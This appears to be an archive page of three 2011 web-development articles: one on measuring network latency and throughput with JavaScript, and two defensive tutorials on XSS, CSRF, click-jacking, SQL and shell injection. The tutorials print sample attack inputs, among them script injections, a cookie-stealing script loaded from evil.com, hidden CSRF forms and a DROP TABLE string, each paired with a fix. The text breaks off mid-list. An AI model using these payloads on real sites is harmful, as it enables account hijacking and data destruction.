Author Archive

Analyzing Network Characteristics Using JavaScript And The DOM, Part 1





 



 


As Web developers, we have an affinity for developing with JavaScript. Whatever the language used in the back end, JavaScript and the browser are the primary language-platform combination available at the user’s end. It has many uses, ranging from silly to experience-enhancing.


(Image: Viktor Hertz)

In this article, we’ll look at some methods of manipulating JavaScript to determine various network characteristics from within the browser — characteristics that were previously available only to applications that directly interface with the operating system. Much of this was discovered while building the Boomerang project to measure real user performance.

What’s In A Network Anyway?

The network has many layers, but the Web developers among us care most about HTTP, which runs over TCP and IP (otherwise known jointly as the Internet protocol suite). Several layers are below that, but for the most part, whether it runs on copper, fiber or homing pigeons does not affect the layers or the characteristics that we care about.

Network Latency

Network latency is typically the time it takes to send a signal across the network and get a response. It’s also often called roundtrip time or ping time because it’s the time reported by the ping command. While this is interesting to network engineers who are diagnosing network problems, Web developers care more about the time it takes to make an HTTP request and get a response. Therefore, we’ll define HTTP latency as the time it takes to make the smallest HTTP request possible, and to get a response with insignificant server-processing time (i.e. the only thing the server does is send a response).

Cool tip: Light and electricity travel through fiber and copper at 66% the speed of light in a vacuum, or 20 × 108 metres per second. A good approximation of network latency between points A and B is four times the time it takes light or electricity to travel the distance. Greg’s Cable Map is a good resource to find out the length and bandwidth of undersea network cables. I’ll leave it to you to put these pieces together.

Network Throughput

Network throughput tells us how well a network is being utilized. We may have a 3-megabit network connection but are effectively using only 2 megabits because the network has a lot of idle time.

DNS

DNS is a little different from everything else we care about. It works over UDP and typically happens at a layer that is transparent to JavaScript. We’ll see how best to ascertain the time it takes to do a DNS lookup.

There is, of course, much more to the network, but determining these characteristics through JavaScript in the browser gets increasingly harder.

Measuring Network Latency With JavaScript

HTTP Get Request

My first instinct was that measuring latency simply entailed sending one packet each way and timing it. It’s fairly easy to do this in JavaScript:

var ts, rtt, img = new Image;
img.onload=function() { rtt=(+new Date - ts) };
ts = +new Date;
img.src="/1x1.gif";

We start a timer, then load a 1 × 1 pixel GIF and measure when its onload event fires. The GIF itself is 35 bytes in size and so fits in a single TCP packet even with HTTP headers added in.

This kinda sorta works, but has inconsistent results. In particular, the first time you load an image, it will take a little longer than subsequent loads — even if we make sure the image isn’t cached. Looking at the TCP packets that go across the network explains what’s happening, as we’ll see in the following section.

TCP Handshake and HTTP Keep-Alive

TCP handshake: SYN-ACK/SYN-ACK

When loading a Web page or image or any other Web resource, a browser opens a TCP connection to the specified Web server, and then makes an HTTP GET request over this connection. The details of the TCP connection and HTTP request are hidden from users and from Web developers as well. They are important, though, if we need to analyze the network’s characteristics.

The first time a TCP connection is opened between two hosts (the browser and the server, in our case), they need to “handshake.â€� This takes place by sending three packets between the two hosts. The host that initiates the connection (the browser in our case) first sends a SYN packet, which kind of means, “Let’s SYNc up. I’d like to talk to you. Are you ready to talk to me?â€� If the other host (the server in our case) is ready, it responds with an ACK, which means, “I ACKnowledge your SYN.â€� And it also sends a SYN of its own, which means, “I’d like to SYNc up, too. Are you ready?” The Web browser then completes the handshake with its own ACK, and the connection is established. The connection could fail, but the process behind a connection failure is beyond the scope of this article.

Once the connection is established, it remains open until both ends decide to close it, by going through a similar handshake.

When we throw HTTP over TCP, we now have an HTTP client (typically a browser) that initiates the TCP connection and sends the first data packet (a GET request, for example). If we’re using HTTP/1.1 (which almost everyone does today), then the default will be to use HTTP keep-alive (Connection: keep-alive). This means that several HTTP requests may take place over the same TCP connection. This is good, because it means that we reduce the overhead of the handshake (three extra packets).

Now, unless we have HTTP pipelining turned on (and most browsers and servers turn it off), these requests will happen serially.

HTTP keep-alive

We can now modify our code a bit to take the time of the TCP handshake into account, and measure latency accordingly.

var t=[], n=2, tcp, rtt;
var ld = function() {
   t.push(+new Date);
   if(t.length > n)
     done();
   else {
     var img = new Image;
     img.onload = ld;
     img.src="/1x1.gif?" + Math.random()
                         + '=' + new Date;
   }
};
var done = function() {
  rtt=t[2]-t[1];
  tcp=t[1]-t[0]-rtt;
};
ld();

With this code, we can measure both latency and the TCP handshake time. There is a chance that a TCP connection was already active and that the first request went through on that connection. In this case, the two times will be very close to each other. In all other cases, rtt, which requires two packets, should be approximately 66% of tcp, which requires three packets. Note that I say “approximately,� because network jitter and different routes at the IP layer can make two packets in the same TCP connection take different
lengths of time to get through.

You’ll notice here that we’ve ignored the fact that the first image might have also required a DNS lookup. We’ll look at that in part 2.

Measuring Network Throughput With JavaScript

Again, our first instinct with this test was just to download a large image and measure how long it takes. Then size/time should tell us the throughput.

For the purpose of this code, let’s assume we have a global object called image, with details of the image’s URL and size in bits.

// Assume global object
// image={ url: …, size: … }
var ts, rtt, bw, img = new Image;
img.onload=function() {
   rtt=(+new Date - ts);
   bw = image.size*1000/rtt;    // rtt is in ms
};
ts = +new Date;
img.src=image.url;

Once this code has completed executing, we should have the network throughput in kilobits per second stored in bw.

Unfortunately, it isn’t that simple, because of something called TCP slow-start.

Slow-Start

In order to avoid network congestion, both ends of a TCP connection will start sending data slowly and wait for an acknowledgement (an ACK packet). Remember than an ACK packet means, “I ACKnowledge what you just sent me.� Every time it receives an ACK without timing out, it assumes that the other end can operate faster and will send out more packets before waiting for the next ACK. If an ACK doesn’t come through in the expected timeframe, it assumes that the other end cannot operate fast enough and so backs off.

TCP window sizes for slow-start

This means that our throughput test above would have been fine as long as our image is small enough to fit within the current TCP window, which at the start is set to 2. While this is fine for slow networks, a fast network really wouldn’t be taxed by so small an image.

Instead, we’ll try by sending across images of increasing size and measuring the time each takes to download.

For the purpose of the code, the global image object is now an array with the following structure:

var image = [
	{url: …, size: … }
];

An array makes it easy to iterate over the list of images, and we can easily add large images to the end of the array to test faster network connections.

var i=0;
var ld = function() {
   if(i > 0)
      image[i-1].end = +new Date;
   if(i >= image.length)
      done();
   else {
      var img = new Image;
      img.onload = ld;
      image[i].start = +new Date;
      img.src=image[i].url;
   }
   i++;
};

Unfortunately, this breaks down when a very slow connection hits one of the bigger images; so, instead, we add a timeout value for each image, designed so that we hit upon common network connection speeds quickly. Details of the image sizes and timeout values are listed in this spreadsheet.

Our code now looks like this:

var i=0;
var ld = function() {
   if(i > 0) {
      image[i-1].end = +new Date;
      clearTimeout(image[i-1].timer);
   }
   if(i >= image.length ||
         (i > 0 && image[i-1].expired))
      done();
   else {
      var img = new Image;
      img.onload = ld;
      image[i].start = +new Date;
      image[i].timer =
            setTimeout(function() {
                       image[i].expired=true
                    },
                    image[i].timeout);
      img.src=image[i].url;
   }
   i++;
};

This looks much better — and works much better, too. But we’d see much variance between multiple runs. The only way to reduce the error in measurement is to run the test multiple times and take a summary value, such as the median. It’s a tradeoff between how accurate you need to be and how long you want the user to wait before the test completes. Getting network throughput to an order of magnitude is often as close as you need to be. Knowing whether the user’s connection is around 64 Kbps or 2 Mbps is useful, but determining whether it’s exactly 2048 or 2500 Kbps is much less useful.

Summary And References

That’s it for part 1 of this series. We’ve looked at how the packets that make up a Web request get through between browser and server, how this changes over time, and how we can use JavaScript and a little knowledge of statistics to make educated guesses at the characteristics of the network that we’re working with.

In the next part, we’ll look at DNS and the difference between IPv6 and IPv4 and the WebTiming API. We’d love to know what you think of this article and what you’d like to see in part 2, so let us know in a comment.

Until then, here’s a list of links to resources that were helpful in compiling this document.

(al)


© Philip Tellis for Smashing Magazine, 2011.


Keeping Web Users Safe By Sanitizing Input Data

Advertisement in Keeping Web Users Safe By Sanitizing Input Data
 in Keeping Web Users Safe By Sanitizing Input Data  in Keeping Web Users Safe By Sanitizing Input Data  in Keeping Web Users Safe By Sanitizing Input Data

In my last article, I spoke about several common mistakes that show up in web applications. Of these, the one that causes the most trouble is insufficient input validation/sanitization. In this article, I’m joined by my colleague Peter (evilops) Ellehauge in looking at input filtering in more depth while picking on a few real examples that we’ve seen around the web. As you’ll see from the examples below, insufficient input validation can result in various kinds of code injection including XSS, and in some cases can be used to phish user credentials or spread malware.

To start with, we’ll take an example[1] from one of the most discussed websites today. This example is from a site that hosts WikiLeaks material. Note that the back end code presented is not the actual code, but what we think it might be based on how the exploit works. The HTML was taken from their website. We think it’s fair to assume that it’s written in PHP as the form’s action is index.php.

<form method='get' action='index.php'>
<input name="search" value="<?php echo $_GET['search'];?>" />
<input type=submit name='getdata' value='Search' /></form>

In this code, the query string parameter search is echoed back to the user without sanitization. An attacker could email or IM unsuspecting users a crafted URL that escapes out of the <input> and does nasty things with JavaScript. A simple way to test for this exploit without doing anything malicious is to use a URL like this:

http://servername/index.php?search="><script>alert(0)</script>

This exploit works because PHP has no default input filtering, and the developers haven’t done any of their own filtering. This exploit would work just as well in most other programming languages as most of them also lack default input filtering. A safer way to write the above code is as follows:

<?php
$search = filter_input(INPUT_POST | INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
?>
<form method='get' action='index.php'>
<input name="search" value="<?php echo $search;?>� />
<input type=submit name='getdata' value='Search' /></form>

This is less convenient though and requires code for every input parameter used, so it is often a good choice to set special_chars as PHP’s default filter, and then override when required. We do this in PHP’s ini file with the following directive:

filter.default="special_chars"

We’re not aware of similar default filters in other languages, but if you know of any, let us know in the comments.

It’s important to note that simply adding this parameter to PHP’s ini file does not automatically make your application secure. This only takes care of the default case where an input parameter is echoed back in an HTML context. However, a web page contains many different contexts and each of these contexts requires input to be validated in a different way.

Is input validation enough?

Recently we’ve stumbled upon the following code:

<?php
$name = "";
if ($_GET['name']) {
    $name = filter_input(INPUT_POST | INPUT_GET, 'name', FILTER_SANITIZE_SPECIAL_CHARS);
}
echo "<a href=login?name=$name>login</a>";
?>

The developer correctly applies input filtering, and this code was reviewed and made live. However, something small seems to have slipped through. The developer hasn’t used quotes around the value of the href attribute, so the browser assumes that its value extends up to the first white-space character. A crafted URL demonstrates the problem:


http://servername/login.php?name=foo+onmouseover=alert(/bar/)

All of the characters in name are safe and pass through the filter untouched, but the resulting HTML looks like this:

<a href=login?name=foo onmouseover=alert(/bar/)>login</a>

The lack of quotes turns the attribute value into an onmouseover event handler. When the unsuspecting user mouses over the link to click on login, the onmouseover handler triggers. Quoting the value of the href attribute fixes the problem here. This is a good enough reason to quote all attribute values even though they are optional according to the HTML spec.

<?php
$name = "";
if ($_GET['name']) {
    $name = filter_input(INPUT_POST | INPUT_GET, 'name', FILTER_SANITIZE_SPECIAL_CHARS);
}
echo "<a href=\"login?name=$name\">login</a>";
?>

For this particular situation though, we also need to look at context. The href attribute accepts a URL as its value, so the value passed to it needs to be urlencoded as well as quoted.

Sql in Keeping Web Users Safe By Sanitizing Input Data
Full image (from xkcd)

Commonly overlooked sections

While many web developers correctly quote and validate input in page content, we find that some sections of the page are still overlooked, possibly because they aren’t perceived to be a problem, or perhaps they’ve just been missed. Here is an example from a dictionary web site:

<title><?php echo $word; ?> - Definitions and more ...</title>

Now by default, no browser executes code within the title tags, so the developer probably thought that it was safe to display data untreated in the title. Carefully crafted input data can escape the title tags and inject script with something like this


http://servername/dictionary?word=</title><script>alert(/xss/)</script>

Other commonly overlooked pages are error pages and error messages. Does your 404 page echo on screen the incorrect URL that was typed in? If it does, then it needs to treat that input first. A banking website recently had code similar to the following[2] (they used ASP in this case):

<%
if Request.Querystring("errmsg") then
    Response.Write("<em>" & Request.QueryString("errmsg") & "</em>")
end if
%>

The errmsg parameter didn’t come in from a form, but from a server-side redirect. The developers assumed that since this URL came from the server it would be safe.

Ads/analytics sections at the bottom of a page are also frequently not handled correctly. Perhaps because boilerplate code is provided and it just works. As the following example from a travel site shows, you should not trust anyone and that includes boilerplate code:

<script type="text/javascript">
google_afs_query = "<?php echo $_GET['query'];?>";
.
.
</script>

This is vulnerable to the following attack string:

http://servername/?query=";alert(0)//

In this case input data needs to be validated for use in a JavaScript context since that’s where the data is echoed out to. What meta-characters would you scan for in this case? Would you quote them or strip them? The answer depends on context, and only you the developer or owner of the page know what the right context is.

Different contexts

Now like we mentioned earlier, input may be used in different contexts, and it needs to be treated differently depending on the context that it will be used in. Sometimes data will be used in multiple contexts and may require to be treated differently for each case. Let’s look at a few cases.

HTML Context

In an HTML context, data is written into an HTML page as part of the content, for example inside a <p> tag. Examples include a search results page, a blog commenting system, dictionary.com’s word of the day, etc. In this context, all HTML meta characters need to be encoded or stripped. That’s primarily < and >, but using PHP’s FILTER_SANITIZE_SPECIAL_CHARS is probably safer, and FILTER_SANITIZE_STRIPPED is probably the safest. Make sure you know what character set your data is in before you try to encode it.

There may be cases when you want to allow some HTML tags, for example in a CMS tool or a commenting system. This is generally a bad idea because there are more ways to get it wrong than to get it right. For example, let’s say that your blogging system allows commenters to markup their comments with some simple tags like <q> and <em>. Now a happy commenter comes along and adds the following code to his comment:

<q onmouseover="alert('xss')">...</q>

You’ve just been XSSed. If you are going to allow a subset of tags, then strip all attributes from those tags. A better idea is to use a CMS specific syntax like BBCode that your back end can translate into safe tags.

Attribute Context

In attribute context, user data is included as the attribute value of an HTML tag. Depending on the attribute in question, the context might be different. For non-event handlers, all HTML meta characters need to be encoded. FILTER_SANITIZE_SPECIAL_CHARS works here as well. In addition, all attribute values should be quoted using single or double quotes or you’ll be hit like the examples above.

For event handling attributes like onmouseover, onclick, onfocus, onblur or similar, you need to be more careful. The best advice is to never ever put input data directly into an event handler. Let’s look at an example.

<?php
  $n = filter_input(INPUT_GET, 'n', FILTER_SANITIZE_SPECIAL_CHARS);
?>
<input type="text" value="" name="n" onfocus="do_something('<?php echo $n; ?>');">

Looks safe, doesn’t it? What happens if an attacker tries to get out of the quoted region using a single quote, i.e., they use a URL like


http://servername/?n=foo');alert('xss

The input is sanitized and all single quotes are converted to &#39;. Unfortunately, this isn’t enough. An event handler executes in two contexts one after the other. The data in the page is first HTML decoded and the result is passed into a JavaScript context. So, as far as the JavaScript handler is concerned, ' and &#39; are exactly the same and this introduces an XSS hole.

The best thing to do is to never pass input data directly into an event handler — even if it has been treated. It’s better to store it as a the value of a hidden field and then let your handler pull the value out of that field. Something like this would be safer:

<?php
  $n = filter_input(INPUT_GET, 'n', FILTER_SANITIZE_SPECIAL_CHARS);
?>
<input type="hidden" id="old_n" value="<?php echo $n ?>">
<input type="text" value="" name="n" onfocus="do_something(document.getElementById('old_n').value);">

URL Context

A special case of the attribute context is URL context. The value of the href and src attributes of various elements are URLs and need to be treated as such. Special characters included in a URL need to be urlencoded to be safe in this context. Using an HTML specific filter is insufficient here as we’ve seen in the missing quotes example above.

Also take note of URLs in meta tags and in HTTP headers. For example, code similar to the following was also recently seen online:

<?php
  if(preg_match('!^https?://(\w+)\.mysite\.com/!', $_GET['done']) {
      header("Location: " . $_GET['done']);
  }
?>

On the face of it, it looks safe enough since we’re checking that the done parameter matches our domain before we redirect, however we aren’t validating the entire URL. An attacker could easily slip in a newline character and then add more headers, for example, a second Location header, or an entire HTML document for that matter. All it takes is a little %0a in the done parameter.

Notice that the match uses a / after .com. This is necessary to protect against user@host style URLs or third party subdomains. For example, a malicious user could create a subdomain called www.mysite.com.evil.com and trick your regex. Alternately, they could use a URL like http://www.mysite.com@www.evil.com/ and trick your regex.

If your URL contains only ASCII characters, then PHP’s FILTER_VALIDATE_URL filter can be used instead of funky regular expressions.

Remember: when writing out URLs, the & character is special in HTML, so it needs to be written out as &amp; (although most browsers will accept it if you don’t), while the ; character is special in an HTTP header, meaning that &amp; will break the header.

When dealing with URLs, figure out which context the URL will be used in, encode it correctly and possibly check the domain. When checking the domain, make sure you use a starts-with match, and include the trailing / to protect against user@host style URLs.

JavaScript Context

If input data needs to be written out in a JavaScript context, i.e., within <script> tags or in a file served as the src attribute of a <script> tag, the data should be JSON encoded. In PHP, the json_encode function can be used. The JSON homepage has a list of JSON libraries for many other languages, all of which have a similar function.

Simply escaping quotes using addslashes or something similar is insufficient, because within script tags quotes can also be represented by their HTML entity values.

One special case to think about in the JavaScript context is the use of web services that return JSON-P data. You do this on your web page by including a script tag that points to a web service and specify a callback function to be called when the data is loaded. For example, to load public photos from Flickr, you’d use something like this:

<script src="http://api.flickr.com/services/feeds/photos_public.gne?format=json&jsoncallback=myfunc"></script>

Before you do that, you’d define myfunc in JavaScript. However, what you’re doing is giving the script from Flickr full access to your page’s DOM. As long as the script respects its contract with you (i.e., the API), you should be safe, but if whoever controlled that script were to suddenly turn evil, you’ve just opened your users up to attack.

In general, only point your scripts tags to URLs that you fully trust, both to not be evil and also to never be compromised themselves. If you must include untrusted scripts, consider sandboxing them in an iframe or use Caja if you can. If you do use an iframe, then consider that there may be certain conditions under which you need to use a double-iframe. This is primarily done to prevent referrer leaking if your page’s URL itself is secret, like a search results page or a capability URL.

CSS Context

Internet Explorer is the only major browser around that allows script execution within CSS using the expression syntax (deprecated and no longer supported in IE8 and later). However, that’s still reason enough to worry about it. As an example, consider a website that allows users to customize the background of their profile pages, similar to MySpace or Twitter (note that neither website is vulnerable to this flaw). Let’s say that you accept a background color and/or image and assign that to the CSS background property. If you don’t correctly validate and sanitize the values passed in by the user, they could pass in a JavaScript expression instead of a real color. This might result in CSS code like this:

background: #28d expression("alert('xss')");

Making sure the background color the user specifies is a valid CSS color and nothing else will protect you from this kind of an attack.

With URLs, a different issue may come in to play. Let’s say that you allow the user to specify their own background image URL. You validate this URL when the user specifies it — to make sure it doesn’t return a 404 error. After this is done, the user could replace the URL with a script that returns a 401 HTTP status code. This makes the browser throw up an authentication dialog, which might confuse the user into entering their username and password of your site. An interesting attack that we haven’t seen outside of the lab.

The fix is to download the specified image to your own server and run some kind of transformation on it, most commonly for size. Even if your transformation does nothing, it can still remove malware that may be embedded in a JPEG.

Other Contexts

There are other contexts that we don’t look at in this article. These commonly deal with the back end and include things like an SQL context or a Shell context or a back end web service context. Another interesting attack that results from improper input validation is HTTP Parameter Pollution or HPP for short.

Should you filter on input or output?

The comments of my last article brought up an interesting point regarding whether data should be filtered on input or output. Since we have so many different contexts, it seems obvious that data should be filtered just before output depending on the context. Filtering for the wrong context could still introduce vulnerabilities. This is the ideal case where every programmer on your team knows what they are doing at all times and always programs with security in mind. In practice, this doesn’t always happen. Even experienced programmers have been known to slip up once or twice, and it’s those occasions that come back to bite you.

A simple guideline is to strip out all punctuation by default and let the web developer override this based on context. This means that using untreated input will either be safe, or not work at all, which serves as a reminder to the developer that they need to think about context. We encourage developers to validate data on input. This involves checking data types, ranges, lengths and possibly the character set/encoding in use. The purpose of validation is to make sure that we receive what we expect to receive. Data should be further sanitized on output depending on context. Sanitization involves transforming (possibly destructively) the data to be safe in the output context. Remember that sometimes a single piece of data may be used in multiple contexts on the same page.

Both validation and sanitization are types of filters to be run on input data, and often both might be required.

In closing

No data that comes in from an untrusted source should be trusted. This would include anything that you did not create yourself. The data may come in as command line parameters, through a query string, through POST data, cookies, HTTP headers, a web service call, an uploaded file, or anything else. If you did not create it, then it can’t be trusted. Validate all data to make sure it’s what you expect, and then treat it to make sure it’s safe in the context where it will be used. Be aware of the different contexts within a web page and keep your users safe.

References

  1. Cablegate security vulnerability
  2. XSS on ICICIDirect
  3. Cross site scripting in CSS
  4. PHP’s input validation and sanitization filters
  5. The Caja Project
  6. Capability based security
  7. HTTP Parameter Pollution
  8. HTTP 4xx status codes
  9. JPEG exploit beats antivirus software

Related Posts

You might be interested in the following related posts:

(vf)


© Philip Tellis for Smashing Magazine, 2011. | Permalink | Post a comment | Add to del.icio.us | Digg this | Stumble on StumbleUpon! | Tweet it! | Submit to Reddit | Forum Smashing Magazine
Post tags: , , , ,


Common Security Mistakes in Web Applications

Smashing-magazine-advertisement in Common Security Mistakes in Web ApplicationsSpacer in Common Security Mistakes in Web Applications
 in Common Security Mistakes in Web Applications  in Common Security Mistakes in Web Applications  in Common Security Mistakes in Web Applications

Web application developers today need to be skilled in a multitude of disciplines. It’s necessary to build an application that is user friendly, highly performant, accessible and secure, all while executing partially in an untrusted environment that you, the developer, have no control over. I speak, of course, about the User Agent. Most commonly seen in the form of a web browser, but in reality, one never really knows what’s on the other end of the HTTP connection.

There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we’re careful with the code we write, the answer to these questions can often be one we’d rather not hear.

We’ll skip over denial of service attacks in this article, but take a close look at the other issues. To be more conformant with standard terminology, we’ll talk about Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Phishing, Shell injection and SQL injection. We’ll also assume PHP as the language of development, but the problems apply regardless of language, and solutions will be similar in other languages.

[Offtopic: by the way, did you already get your copy of the Smashing Book?]

1. Cross-site scripting (XSS)

Cross-site scripting is an attack in which a user is tricked into executing code from an attacker’s site (say evil.com) in the context of our website (let’s call it www.mybiz.com). This is a problem regardless of what our website does, but the severity of the problem changes depending on what our users can do on the site. Let’s look at an example.

Let’s say that our site allows the user to post cute little messages for the world (or maybe only their friends) to see. We’d have code that looks something like this:

<?php
  echo "$user said $message";
?>

To read the message in from the user, we’d have code like this:

<?php
  $user = $_COOKIE['user'];
  $message = $_REQUEST['message'];
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

This works only as long as the user sticks to messages in plain text, or perhaps a few safe HTML tags like <strong> or <em>. We’re essentially trusting the user to only enter safe text. An attacker, though, may enter something like this:

Hi there...<script src="h++p://evil.com/bad-script.js"></script>

(Note that I’ve changed http to h++p to prevent auto-linking of the URL).

When a user views this message on their own page, they load bad-script.js into their page, and that script could do anything it wanted, for example, it could steal the contents of document.cookie, and then use that to impersonate the user and possibly send spam from their account, or more subtly, change the contents of the HTML page to do nasty things, possibly installing malware onto the reader’s computer. Remember that bad-script.js now executes in the context of www.mybiz.com.

This happens because we’ve trusted the user more than we should. If, instead, we only allow the user to enter contents that are safe to display on the page, we prevent this form of attack. We accomplish this using PHP’s input_filter extension.

We can change our PHP code to the following:

<?php
  $user = filter_input(INPUT_COOKIE, 'user',
                         FILTER_SANITIZE_SPECIAL_CHARS);
  $message = filter_input(INPUT_POST | INPUT_GET, 'message',
                         FILTER_SANITIZE_SPECIAL_CHARS);
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

Notice that we run the filter on the input and not just before output. We do this to protect against the situation where a new use case may arise in the future, or a new programmer comes in to the project, and forgets to sanitize data before printing it out. By filtering at the input layer, we ensure that we never store unsafe data. The side-effect of this is that if you have data that needs to be displayed in a non-web context (e.g. a mobile text message/pager message), then it may be unsuitably encoded. You may need further processing of the data before sending it to that context.

Now chances are that almost everything you get from the user is going to be written back to the browser at some point, so it may be best to just set the default filter to FILTER_SANITIZE_SPECIAL_CHARS by changing filter.default in your php.ini file.

PHP has many different input filters, and it’s important to use the one most relevant to your data. Very often an XSS creeps in because we use FILTER_SANITIZE_SPECIAL_CHARS when we should have used FILTER_SANITIZE_ENCODED or FILTER_SANITIZE_URL or vice-versa. You should also carefully review any code that uses something like html_entity_decode, because this could potentially open your code up for attack by undoing the encoding added by the input filter.

If a site is open to XSS attacks, then its users’ data is not safe.

2. Cross-site request forgery (CSRF)

A CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors into carrying out an action on our site. This can happen if a user logs in to a site that they use a lot (e.g. e-mail, Facebook, etc.), and then visits a malicious site without first logging out. If the original site is susceptible to a CSRF attack, then the malicious site can do evil things on the user’s behalf. Let’s take the same example as above.

Since our application reads in input either from POST data or from the query string, an attacker could trick our user into posting a message by including code like this on their website:

<img src="h++p://www.mybiz.com/post_message?message=Cheap+medicine+at+h++p://evil.com/"
     style="position:absolute;left:-999em;">

Now all the attacker needs to do, is get users of mybiz.com to visit their site. This is fairly easily accomplished by, for example, hosting a game, or pictures of cute baby animals. When the user visits the attacker’s site, their browser sends a GET request to www.mybiz.com/post_message. Since the user is still logged in to www.mybiz.com, the browser sends along the user’s cookies, thereby posting an advertisement for cheap medicine to all the user’s friends.

Simply changing our code to only accept submissions via POST doesn’t fix the problem. The attacker can change the code to something like this:

<iframe name="pharma" style="display:none;"></iframe>
<form id="pform"
      action="h++p://www.mybiz.com/post_message"
      method="POST"
      target="pharma">
<input type="hidden" name="message" value="Cheap medicine at ...">
</form>
<script>document.getElementById('pform').submit();</script>

Which will POST the form back to www.mybiz.com.

The correct way to to protect against a CSRF is to use a single use token tied to the user. This token can only be issued to a signed in user, and is based on the user’s account, a secret salt and possibly a timestamp. When the user submits the form, this token needs to be validated. This ensures that the request originated from a page that we control. This token only needs to be issued when a form submission can do something on behalf of the user, so there’s no need to use it for publicly accessible read-only data. The token is sometimes referred to as a nonce.

There are several different ways to generate a nonce. For example, have a look at the wp_create_nonce, wp_verify_nonce and wp_salt functions in the WordPress source code. A simple nonce may be generated like this:

<?php
function get_nonce() {
  return md5($salt . ":"  . $user . ":"  . ceil(time()/86400));
}
?>

The timestamp we use is the current time to an accuracy of 1 day (86400 seconds), so it’s valid as long as the action is executed within a day of requesting the page. We could reduce that value for more sensitive actions (like password changes or account deletion). It doesn’t make sense to have this value larger than the session timeout time.

An alternate method might be to generate the nonce without the timestamp, but store it as a session variable or in a server side database along with the time when the nonce was generated. That makes it harder for an attacker to generate the nonce by guessing the time when it was generated.

<?php
function get_nonce() {
  $nonce = md5($salt . ":"  . $user);
  $_SESSION['nonce'] = $nonce;
  $_SESSION['nonce_time'] = time();
  return $nonce;
}
?>

We use this nonce in the input form, and when the form is submitted, we regenerate the nonce or read it out of the session variable and compare it with the submitted value. If the two match, then we allow the action to go through. If the nonce has timed out since it was generated, then we reject the request.

<?php
  if(!verify_nonce($_POST['nonce'])) {
     header("HTTP/1.1 403 Forbidden", true, 403);
     exit();
  }
  // proceed normally
?>

This protects us from the CSRF attack since the attacker’s website cannot generate our nonce.

If you don’t use a nonce, your user can be tricked into doing things they would not normally do. Note that even if you do use a nonce, you may still be susceptible to a click-jacking attack.

3. Click-jacking

While not on the OWASP top ten list for 2010, click-jacking has gained recent fame due to attacks against Twitter and Facebook, both of which spread very quickly due to the social nature of these platforms.

Now since we use a nonce, we’re protected against CSRF attacks, however, if the user is tricked into clicking the submit link themselves, then the nonce won’t protect us. In this kind of attack, the attacker includes our website in an iframe on their own website. The attacker doesn’t have control over our page, but they do control the iframe element. They use CSS to set the iframe’s opacity to 0, and then use JavaScript to move it around such that the submit button is always under the user’s mouse. This was the technique used on the Facebook Like button click-jack attack.

Frame busting appears to be the most obvious way to protect against this, however it isn’t fool proof. For example, adding the security="restricted" attribute to an iframe will stop any frame busting code from working in Internet Explorer, and there are ways to prevent frame busting in Firefox as well.

A better way might be to make your submit button disabled by default and then use JavaScript to enable it once you’ve determined that it’s safe to do so. In our example above, we’d have code like this:

<input type="text" name="message" value="<?php echo $message ?>">
<input id="msg_btn" type="submit" disabled="true">
<script type="text/javascript">
if(top == self) {
   document.getElementById("msg_btn").disabled=false;
}
</script>

This way we ensure that the submit button cannot be clicked on unless our page runs in a top level window. Unfortunately, this also means that users with JavaScript disabled will also be unable to click the submit button.

4. SQL injection

In this kind of an attack, the attacker exploits insufficient input validation to gain shell access on your database server. XKCD has a humorous take on SQL injection:

Sql in Common Security Mistakes in Web Applications
Full image (from xkcd)

Let’s go back to the example we have above. In particular, let’s look at the save_message() function.

<?php
function save_message($user, $message)
{
  $sql = "INSERT INTO Messages (
            user, message
          ) VALUES (
            '$user', '$message'
          )";

  return mysql_query($sql);
}
?>

The function is oversimplified here, but it exemplifies the problem. The attacker could enter something like

test');DROP TABLE Messages;--

When this gets passed to the database, it could end up dropping the Messages table, causing you and your users a lot of grief. This kind of an attack calls attention to the attacker, but little else. It’s far more likely for an attacker to use this kind of attack to insert spammy data on behalf of other users. Consider this message instead:

test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...

Here the attacker has successfully managed to insert spammy messages into the comment streams from user2 and user3 without needing access to their accounts. The attacker could also use this to download your entire user table that possibly includes usernames, passwords and email addresses.

Fortunately, we can use prepared statements to get around this problem. In PHP, the PDO abstraction layer makes it easy to use prepared statements even if your database itself doesn’t support them. We could change our code to use PDO.

<?php
function save_message($user, $message)
{
  // $dbh is a global database handle
  global $dbh;

  $stmt = $dbh->prepare('
                     INSERT INTO Messages (
                          user, message
                     ) VALUES (
                          ?, ?
                     )');
  return $stmt->execute(array($user, $message));
}
?>

This protects us from SQL injection by correctly making sure that everything in $user goes into the user field and everything in $message goes into the message field even if it contains database meta characters.

There are cases where it’s hard to use prepared statements. For example, if you have a list of values in an IN clause. However, since our SQL statements are always generated by code, it is possible to first determine how many items need to go into the IN clause, and add as many ? placeholders instead.

5. Shell injection

Similar to SQL injection, the attacker tries to craft an input string to gain shell access to your web server. Once they have shell access, they could potentially do a lot more. Depending on access privileges, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network.

Shell injection can take place whenever you pass untreated user input to the shell, for example by using the system(), exec() or `` commands. There may be more functions depending on the language you use when building your web app.

The solution is the same for XSS attacks. You need to validate and sanitize all user inputs appropriately for where it will be used. For data that gets written back into an HTML page, we use PHP’s input_filter() function with the FILTER_SANITIZE_SPECIAL_CHARS flag. For data that gets passed to the shell, we use the escapeshellcmd() and escapeshellarg() functions. It’s also a good idea to validate the input to make sure it only contains a whitelist of characters. Always use a whitelist instead of a blacklist. Attackers find inventive ways of getting around a blacklist.

If an attacker can gain shell access to your box, all bets are off. You may need to wipe everything off that box and reimage it. If any passwords or secret keys were stored on that box (in configuration files or source code), they will need to be changed at all locations where they are used. This could prove quite costly for your organization.

6. Phishing

Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page that looks exactly like your login page, and ask the user to log in there by sending them a link via e-mail, IM, Facebook, or something similar. Since the attacker’s page looks identical to yours, the user may enter their login credentials without realizing that they’re on a malicious site. The primary method to protect your users from phishing is user training, and there are a few things that you could do for this to be effective.

  1. Always serve your login page over SSL. This requires more server resources, but it ensures that the user’s browser verifies that the page isn’t being redirected to a malicious site.
